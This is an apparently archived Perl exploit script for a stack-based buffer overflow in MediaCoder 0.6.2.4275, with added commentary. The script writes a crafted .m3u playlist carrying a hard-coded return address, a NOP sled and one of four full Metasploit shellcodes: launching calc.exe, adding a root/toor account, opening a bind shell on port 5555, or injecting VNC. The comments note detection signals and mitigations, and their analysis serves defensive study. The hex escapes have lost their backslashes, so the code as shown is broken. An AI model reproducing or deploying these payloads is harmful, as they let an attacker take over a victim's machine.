
# Title : MediaCoder 0.6.2.4275 (m3u File) Universal Stack Overflow Exploit
# Published : 2009-03-09
# Author : Stack


#!/usr/bin/perl
# MediaCoder 0.6.2.4275 Universal Stack Based Overflow
# By Stack
# Mountassif Moad
# cat Greatz.txt
# Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z
# Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & welahima b9ite 3arefe chkoune akhore rani tansa :d
# ahe nsite big thnx to Str0ke and thanks you for all patience and your advice & support
# Exploit layout (classic stack-based overflow): an M3U header, a fixed-length
# filler, a hard-coded return address, a NOP sled, then an encoded payload.
# Detection note: read as bytes, the hex pairs below decode to an "#EXTM3U"
# header, one "#EXTINF" entry ("Lamb Of God - Set To Fail") and a "D:\" path
# prefix that is immediately followed by the filler — a single oversized
# entry of that shape is the signature of a crafted playlist file.
my $header= "x23x45x58x54x4Dx33x55x0Dx0Ax23x45x58x54x49x4Ex46".
            "x3Ax33x3Ax35x30x2Cx4Cx61x6Dx62x20x4Fx66x20x47x6F".
            "x64x20x2Dx20x53x65x74x20x54x6Fx20x46x61x69x6Cx20".
            "x0Dx0Ax44x3Ax5C";
   
# 254 filler bytes before the overwritten return address (offset as published
# by the author for this build; it is not derived anywhere in this file).
my $junk  = "x41" x 254;
# One fixed 4-byte address that the author calls "universal". Hard-coded
# addresses like this depend on a module loaded at a predictable base; ASLR
# and DEP are the platform mitigations that break this technique.
my $ret   = "x93x43x92x7c"; # Universal return adress :d
# 25-byte NOP sled, written both before and after the chosen payload.
my $nop   = "x90" x 25;
# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
# Payload 1: Metasploit win32_exec launching calc.exe, PexAlphaNum-encoded
# (351 bytes per the generator line above) — the benign proof-of-concept
# option that only demonstrates code execution. The first four lines are
# identical across all four payloads in this file, consistent with a shared
# decoder stub emitted by the encoder (not verified here).
my $calc_shell =
    "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
    "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
    "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
    "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
    "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44".
    "x42x50x42x50x42x30x4bx48x45x34x4ex43x4bx38x4ex47".
    "x45x30x4ax57x41x30x4fx4ex4bx48x4fx34x4ax51x4bx48".
    "x4fx55x42x52x41x50x4bx4ex49x34x4bx48x46x53x4bx48".
    "x41x50x50x4ex41x33x42x4cx49x49x4ex4ax46x58x42x4c".
    "x46x37x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e".
    "x46x4fx4bx53x46x55x46x52x46x30x45x37x45x4ex4bx38".
    "x4fx45x46x32x41x30x4bx4ex48x56x4bx38x4ex50x4bx54".
    "x4bx48x4fx45x4ex51x41x30x4bx4ex4bx58x4ex41x4bx58".
    "x41x50x4bx4ex49x48x4ex45x46x42x46x30x43x4cx41x43".
    "x42x4cx46x36x4bx58x42x34x42x33x45x48x42x4cx4ax57".
    "x4ex30x4bx48x42x44x4ex30x4bx48x42x47x4ex41x4dx4a".
    "x4bx48x4ax46x4ax50x4bx4ex49x30x4bx58x42x38x42x4b".
    "x42x50x42x50x42x30x4bx48x4ax36x4ex53x4fx45x41x33".
    "x48x4fx42x36x48x45x49x48x4ax4fx43x38x42x4cx4bx47".
    "x42x55x4ax46x42x4fx4cx38x46x50x4fx55x4ax36x4ax39".
    "x50x4fx4cx38x50x50x47x45x4fx4fx47x4ex43x36x41x36".
    "x4ex56x43x36x50x32x45x36x4ax57x45x56x42x30x5a";

# win32_adduser -  PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
# Payload 2: Metasploit win32_adduser creating a local account root/toor
# (489 bytes per the generator line above). Unlike the calc payload this one
# makes a persistent change to the host; an unexpected local account created
# by a media-player process is the detection signal for it.
my $adduser_shell =
    "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
    "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
    "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
    "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
    "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44".
    "x42x30x42x30x42x50x4bx58x45x54x4ex43x4bx58x4ex37".
    "x45x50x4ax37x41x30x4fx4ex4bx58x4fx44x4ax31x4bx48".
    "x4fx55x42x32x41x30x4bx4ex49x44x4bx38x46x43x4bx58".
    "x41x50x50x4ex41x33x42x4cx49x39x4ex4ax46x58x42x4c".
    "x46x37x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e".
    "x46x4fx4bx53x46x45x46x52x46x30x45x47x45x4ex4bx58".
    "x4fx35x46x52x41x30x4bx4ex48x46x4bx38x4ex30x4bx54".
    "x4bx58x4fx35x4ex31x41x30x4bx4ex4bx58x4ex41x4bx38".
    "x41x50x4bx4ex49x38x4ex45x46x52x46x30x43x4cx41x53".
    "x42x4cx46x46x4bx48x42x54x42x53x45x38x42x4cx4ax37".
    "x4ex30x4bx48x42x34x4ex30x4bx58x42x47x4ex51x4dx4a".
    "x4bx48x4ax36x4ax30x4bx4ex49x30x4bx48x42x48x42x4b".
    "x42x30x42x50x42x50x4bx58x4ax46x4ex43x4fx35x41x53".
    "x48x4fx42x46x48x55x49x38x4ax4fx43x58x42x4cx4bx57".
    "x42x45x4ax56x42x4fx4cx58x46x50x4fx35x4ax56x4ax49".
    "x50x4fx4cx48x50x50x47x55x4fx4fx47x4ex43x36x4dx46".
    "x46x36x50x52x45x56x4ax57x45x36x42x52x4fx42x43x56".
    "x42x42x50x56x45x36x46x37x42x52x45x37x43x47x45x46".
    "x44x57x42x52x44x57x4fx56x4fx56x46x37x42x42x46x57".
    "x4fx46x4fx46x44x37x42x42x4fx52x41x44x46x34x46x34".
    "x42x42x48x32x48x52x42x32x50x36x45x46x46x47x42x42".
    "x4ex56x4fx56x43x46x41x56x4ex46x47x36x44x37x4fx56".
    "x45x47x42x57x42x42x41x44x46x36x4dx46x49x46x50x56".
    "x49x36x43x57x46x37x44x37x41x56x46x37x4fx46x44x57".
    "x43x47x42x32x44x57x4fx56x4fx56x46x47x42x32x4fx32".
    "x41x44x46x44x46x34x42x50x5a";

# win32_bind -  EXITFUNC=seh LPORT=5555 Size=709 Encoder=PexAlphaNum http://metasploit.com
# Payload 3: Metasploit win32_bind listening on TCP port 5555 (709 bytes per
# the generator line above). The exploited player process would open an
# inbound listener — a desktop application unexpectedly listening on a port is
# the detection signal, and a host firewall that blocks unsolicited inbound
# connections blunts this payload even when the overflow succeeds.
my $bind_shell =
    "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
    "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
    "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
    "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
    "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e".
    "x4dx34x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx38".
    "x4ex46x46x42x46x32x4bx48x45x54x4ex53x4bx58x4ex47".
    "x45x30x4ax57x41x30x4fx4ex4bx48x4fx34x4ax31x4bx58".
    "x4fx55x42x42x41x50x4bx4ex49x54x4bx38x46x53x4bx38".
    "x41x30x50x4ex41x43x42x4cx49x39x4ex4ax46x38x42x4c".
    "x46x57x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e".
    "x46x4fx4bx43x46x45x46x52x4ax52x45x37x45x4ex4bx48".
    "x4fx45x46x42x41x30x4bx4ex48x36x4bx38x4ex50x4bx34".
    "x4bx48x4fx35x4ex41x41x30x4bx4ex43x50x4ex32x4bx38".
    "x49x58x4ex56x46x42x4ex41x41x56x43x4cx41x53x4bx4d".
    "x46x36x4bx38x43x34x42x53x4bx58x42x34x4ex30x4bx48".
    "x42x47x4ex51x4dx4ax4bx58x42x54x4ax50x50x45x4ax56".
    "x50x58x50x44x50x30x4ex4ex42x35x4fx4fx48x4dx48x56".
    "x43x35x48x46x4ax46x43x43x44x53x4ax36x47x37x43x47".
    "x44x33x4fx45x46x55x4fx4fx42x4dx4ax46x4bx4cx4dx4e".
    "x4ex4fx4bx53x42x45x4fx4fx48x4dx4fx45x49x58x45x4e".
    "x48x46x41x38x4dx4ex4ax50x44x30x45x35x4cx46x44x30".
    "x4fx4fx42x4dx4ax46x49x4dx49x30x45x4fx4dx4ax47x45".
    "x4fx4fx48x4dx43x55x43x35x43x45x43x55x43x55x43x34".
    "x43x45x43x54x43x35x4fx4fx42x4dx48x36x4ax36x45x41".
    "x43x4bx48x36x43x45x49x38x41x4ex45x49x4ax56x46x4a".
    "x4cx41x42x57x47x4cx47x45x4fx4fx48x4dx4cx46x42x41".
    "x41x55x45x45x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x52".
    "x49x4ex47x35x4fx4fx48x4dx43x55x45x55x4fx4fx42x4d".
    "x4ax36x45x4ex49x44x48x58x49x44x47x45x4fx4fx48x4d".
    "x42x45x46x35x46x55x45x35x4fx4fx42x4dx43x39x4ax46".
    "x47x4ex49x57x48x4cx49x37x47x55x4fx4fx48x4dx45x45".
    "x4fx4fx42x4dx48x36x4cx46x46x36x48x36x4ax56x43x36".
    "x4dx36x49x58x45x4ex4cx56x42x55x49x35x49x52x4ex4c".
    "x49x58x47x4ex4cx36x46x34x49x48x44x4ex41x43x42x4c".
    "x43x4fx4cx4ax50x4fx44x54x4dx52x50x4fx44x54x4ex32".
    "x43x39x4dx38x4cx47x4ax33x4bx4ax4bx4ax4bx4ax4ax56".
    "x44x47x50x4fx43x4bx48x51x4fx4fx45x57x46x34x4fx4f".
    "x48x4dx4bx35x47x35x44x45x41x55x41x35x41x55x4cx36".
    "x41x30x41x55x41x35x45x35x41x45x4fx4fx42x4dx4ax46".
    "x4dx4ax49x4dx45x30x50x4cx43x35x4fx4fx48x4dx4cx46".
    "x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx38x47x45x4ex4f".
    "x43x38x46x4cx46x46x4fx4fx48x4dx44x45x4fx4fx42x4d".
    "x4ax56x42x4fx4cx58x46x30x4fx55x43x35x4fx4fx48x4d".
    "x4fx4fx42x4dx5a";

# win32_bind_vncinject -  VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com
# Payload 4: Metasploit win32_bind_vncinject (649 bytes per the generator
# line above), generated with VNCPORT=5900 and LPORT=4444, i.e. two inbound
# listeners rather than one. The VNCDLL path in the generator line is the
# author's own Metasploit install and is not part of the payload output.
# Same detection and firewall considerations as the bind shell above.
my $bind_vncinject =
       "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
    "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
    "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
    "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
    "x56x58x34x5ax38x42x44x4ax4fx4dx4ax4ex48x55x42x50".
    "x42x30x42x30x43x55x45x35x48x45x47x45x4bx38x4ex36".
    "x46x42x4ax31x4bx38x45x54x4ex33x4bx48x46x55x45x30".
    "x4ax47x41x50x4cx4ex4bx58x4cx54x4ax31x4bx48x4cx55".
    "x42x42x41x50x4bx4ex43x4ex44x43x49x54x4bx58x46x33".
    "x4bx48x41x30x50x4ex41x33x4fx4fx4ex4fx41x43x42x4c".
    "x4ex4ax4ax53x42x4ex46x57x47x30x41x4cx4fx4cx4dx30".
    "x41x30x47x4cx4bx4ex44x4fx4bx33x4ex47x46x42x46x51".
    "x45x37x41x4ex4bx38x4cx35x46x52x41x30x4bx4ex48x56".
    "x4bx58x4ex50x4bx54x4bx48x4cx55x4ex51x41x30x4bx4e".
    "x4bx58x46x30x4bx58x41x50x4ax4ex4bx4ex44x50x41x43".
    "x42x4cx4fx35x50x35x4dx35x4bx45x44x4cx4ax50x42x50".
    "x50x55x4cx36x42x33x49x55x46x46x4bx58x49x31x4bx38".
    "x4bx45x4ex50x4bx38x4bx35x4ex31x4bx48x4bx51x4bx58".
    "x4bx45x4ax30x43x55x4ax56x50x38x50x34x50x50x4ex4e".
    "x4fx4fx48x4dx49x48x47x4cx41x58x4ex4ex42x50x41x50".
    "x42x50x42x30x47x45x48x55x43x45x49x38x45x4ex4ax4e".
    "x47x52x42x30x42x30x42x30x42x59x41x50x42x30x42x50".
    "x48x4bx49x51x4ax51x47x4ex46x4ax49x31x42x47x49x4e".
    "x45x4ex49x54x48x58x49x54x46x4ax4cx51x42x37x47x4c".
    "x46x4ax4dx4ax50x42x49x4ex49x4dx49x50x45x4fx4dx4a".
    "x4bx4cx4dx4ex4ex4fx4bx43x47x45x43x35x44x33x4fx45".
    "x43x33x44x43x42x30x4bx45x4dx38x4bx34x42x42x41x55".
    "x4fx4fx47x4dx49x58x4fx4dx49x38x43x4cx4dx58x45x47".
    "x46x41x4cx36x47x30x49x45x41x35x43x45x4fx4fx46x43".
    "x4fx38x4fx4fx45x35x46x50x49x35x49x58x46x50x50x48".
    "x44x4ex44x4fx4bx32x47x52x46x35x4fx4fx47x43x4fx4f".
    "x45x35x42x43x41x53x42x4cx42x45x42x35x42x35x42x55".
    "x42x54x42x55x42x44x42x35x4fx4fx45x45x4ex32x49x48".
    "x47x4cx41x53x4bx4dx43x45x43x45x4ax46x44x30x42x50".
    "x41x31x4ex55x49x48x42x4ex4cx36x42x31x42x35x47x55".
    "x4fx4fx45x35x46x32x43x55x47x45x4fx4fx45x45x4ax32".
    "x43x55x46x35x47x45x4fx4fx45x55x42x32x49x48x47x4c".
    "x41x58x4ex4ex42x50x42x31x42x50x42x50x49x58x43x4e".
    "x4cx46x42x50x4ax46x42x30x42x51x42x30x42x30x43x35".
    "x47x45x4fx4fx45x35x4ax31x41x58x4ex4ex42x30x46x30".
    "x42x30x42x30x4fx4fx43x4dx5a";
# Option dispatch: the first command-line argument selects which payload is
# written to STDOUT (the usage banner below shows the output being redirected
# into a .m3u file). $id is an undeclared package global — this file has no
# `use strict` or `use warnings` — and `==` treats a missing or non-numeric
# argument as 0, so anything other than 1-4 falls through to the banner.
# Each variant writes, in order: header, filler, return address, NOP sled,
# payload, NOP sled. Note that the `.` characters sit inside the double-quoted
# string, so they are emitted as literal dots between the parts rather than
# acting as the concatenation operator.
$id = $ARGV[0];
if ($id==1){
print "$header.$junk.$ret.$nop.$calc_shell.$nop";
exit;
}
if ($id==2){
print "$header.$junk.$ret.$nop.$adduser_shell.$nop";
exit;
}
if ($id==3){
print "$header.$junk.$ret.$nop.$bind_shell.$nop";
exit;
}
if ($id==4){
print "$header.$junk.$ret.$nop.$bind_vncinject.$nop";
exit;
}
# Usage banner, reached only when no recognised option (1-4) was given.
# $0 interpolates the script name into the example command. As written, every
# string ends in the literal letter n and contains no newline, so the banner
# prints as one run-on line rather than the boxed layout the spacing suggests.
print "n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++n";
print " +++                                                        +++n";
print " +++                                                        +++n";
print " +++ MediaCoder 0.6.2.4275 Universal Stack-Based Overflow   +++n";
print " +++ Written By Stack                                       +++n";
print " +++                                                        +++n";
print " +++   Usage Ex.: perl $0 1 >>Exploit.m3u              +++n";
print " +++                                                        +++n";
print " +++  Options:                                              +++n";
print " +++          1 - win32_exec calc.exe                       +++n";
print " +++          2 - win32_adduser Pass=toor User=root         +++n";
print " +++          3 - win32_bind Port 5555                      +++n";
print " +++          4 - win32_bind_vncinject Port 5900            +++n";
print " +++                                                        +++n";
print " +++                                                        +++n";
print " +++                                                        +++n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++n";
exit;
#EOF
